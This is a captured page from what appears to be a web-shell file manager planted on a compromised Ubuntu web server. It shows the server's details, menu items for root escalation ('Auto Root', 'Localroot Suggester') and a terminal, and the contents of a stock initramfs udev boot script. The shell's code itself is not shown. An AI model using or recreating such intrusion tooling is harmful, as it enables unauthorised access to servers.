Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
initramfs-tools /
scripts /
init-bottom /
Delete
Unzip
Name
Size
Permission
Date
Action
cloud-initramfs-dyn-netconf
5.08
KB
-rwxr-xr-x
2025-08-05 17:14
copymods
2.02
KB
-rwxr-xr-x
2025-08-05 17:14
lvm2
370
B
-rwxr-xr-x
2024-06-05 11:14
overlayroot
25.96
KB
-rwxr-xr-x
2025-08-05 17:14
plymouth
190
B
-rwxr-xr-x
2025-02-25 05:47
udev
611
B
-rwxr-xr-x
2026-03-24 13:45
Save
Rename
#!/bin/sh -e PREREQS="" prereqs() { echo "$PREREQS"; } case "$1" in prereqs) prereqs exit 0 ;; esac # Stop udevd, we'll miss a few events while we run init, but we catch up udevadm control --exit # move the /dev tmpfs to the rootfs; fall back to util-linux mount that does # not understand -o move mount -n -o move /dev "${rootmnt:?}/dev" || mount -n --move /dev "${rootmnt}/dev" # create a temporary symlink to the final /dev for other initramfs scripts if command -v nuke >/dev/null; then nuke /dev else # shellcheck disable=SC2114 rm -rf /dev fi ln -s "${rootmnt}/dev" /dev